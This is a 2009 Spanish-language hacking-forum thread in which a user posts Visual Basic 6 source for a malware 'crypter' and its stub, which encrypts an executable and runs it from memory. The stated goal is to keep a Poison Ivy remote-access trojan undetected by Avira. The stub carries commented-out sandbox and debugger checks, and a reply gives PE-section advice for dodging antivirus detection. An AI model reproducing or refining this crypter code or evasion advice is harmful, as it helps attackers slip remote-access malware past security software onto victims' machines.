elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda con Source de un Cripter RUNTIME
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con Source de un Cripter RUNTIME  (Leído 1,898 veces)
alientunero

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Ayuda con Source de un Cripter RUNTIME
« en: 20 Febrero 2009, 16:54 pm »

Actualmente estoy modificando desde source y por metodos rit,hex,xor... un cripter.
El stub lo e dejado FUD y el cripter esta 100% limpio.
Pero al cifrar un server de PI se une el avira...
¿Me podeis hechar una mano?
¿Que puedo hacer?

he contactado con EON y estas son sus palabras
"adapta el cripter y el stub para que en vez de leer/cargar del/en eof lean/carguen del resource"

Parte del Cripter:
Código:
Private Sub chameleonButton3_Click()
    Dim Buffer() As Byte
    Dim ResBuffer() As Byte
    Dim EofData As String
    Dim Buffer2 As String
    Dim Stubpath As String
   
    With CommonDialog1
        .CancelError = True
        .DialogTitle = "Selecciona donde guardar el archivo cifrado"
        .DefaultExt = ".exe"
        .Filter = "Executables|*.exe"
        .FileName = "cifrado.exe"
    End With
    CommonDialog1.ShowSave
    Stubpath = CommonDialog1.FileName
   
    ResBuffer() = LoadResData(101, "CUSTOM")
    Open Stubpath For Binary As #3
    Put #3, , ResBuffer()
    Close #3

    Text3.Text = Text3.Text & "Leyendo archivo..." & vbCrLf
    Text3.Text = Text3.Text & "cifrando..." & vbCrLf
   
    EncodeArrayB LoadFile(Text1.Text), Text2.Text
    Buffer() = encoded()
   
    Buffer2 = StrConv(LoadFile(Text1.Text), vbUnicode)
    EofData = Mid(Buffer2, GetEOF(Text1.Text), FileLen(Text1.Text))
   
    Open Stubpath For Binary As #1
    Put #1, LOF(1) + 1, "<Lamark>"
    Put #1, LOF(1) + 1, Buffer()
    Put #1, LOF(1) + 1, "<Lamark>"
    Put #1, LOF(1) + 1, Text2.Text
    Put #1, LOF(1) + 1, "<Lamark>"
    Put #1, LOF(1) + 1, EofData
    Close #1
   
    PatchEOF Stubpath 'removed cause it crashes the eof data
   
    Open Stubpath For Binary As #1
    Put #1, LOF(1) + 1, EofData
    Close #1
   
    Text3.Text = Text3.Text & "cifrado!" & vbCrLf
    MsgBox "El archivo fue cifrado correctamente", 64, "CripTNT"
End Sub

Parte del Stub:
Código:
Dim d4täN() As String
Dim iNh41T As String
Dim Ev1L() As Byte
Dim Myself As String

Sub Main()
    On Error Resume Next
    'If Sandboxed = True Then MsgBox ""
    'If Anubis = True Then MsgBox ""
    'If Debugger = True Then MsgBox ""
   
    Myself = App.Path & "\" & App.EXEName & ".exe"
    Open Myself For Binary As #1
    iNh41T = Space(FileLen(Myself))
    Get #1, 1, iNh41T
    Close #1
   
    d4täN() = Split(iNh41T, "<Lamark>")
    Ev1L() = StrConv(d4täN(1), vbFromUnicode)
    EncodeArrayB Ev1L(), d4täN(2)
    RunExe Myself, encoded()
End Sub

El stub va dentro del Cripter como res
Alguien me ayuda PORFAVOR? Alguien seria tan amable de ayudarme con teamviewer?
Muchas gracias y espero contestación


En línea

[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Ayuda con Source de un Cripter RUNTIME
« Respuesta #1 en: 22 Febrero 2009, 11:53 am »

Avira detecta todo EOF data como malware. Tienes que alargar la última sección o crear una nueva y meterlo ahí. Si te suena a chino lo que hablo busca información sobre el formato PE  :P.

Saludos


En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
duda filezilla FTP con cripter
Análisis y Diseño de Malware
marcelo2009 1 2,182 Último mensaje 18 Noviembre 2011, 03:08 am
por marcelo2009
MOVIDO: duda filezilla FTP con cripter
Seguridad
skapunky 0 1,842 Último mensaje 18 Noviembre 2011, 13:17 pm
por skapunky
AYUDA: Modificar cadena en Runtime
Ingeniería Inversa
x64core 3 2,699 Último mensaje 7 Marzo 2012, 04:48 am
por Иōҳ
[Tutorial] programando un cripter en VB6.
Análisis y Diseño de Malware
fary 1 4,014 Último mensaje 13 Marzo 2016, 22:33 pm
por crack81
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines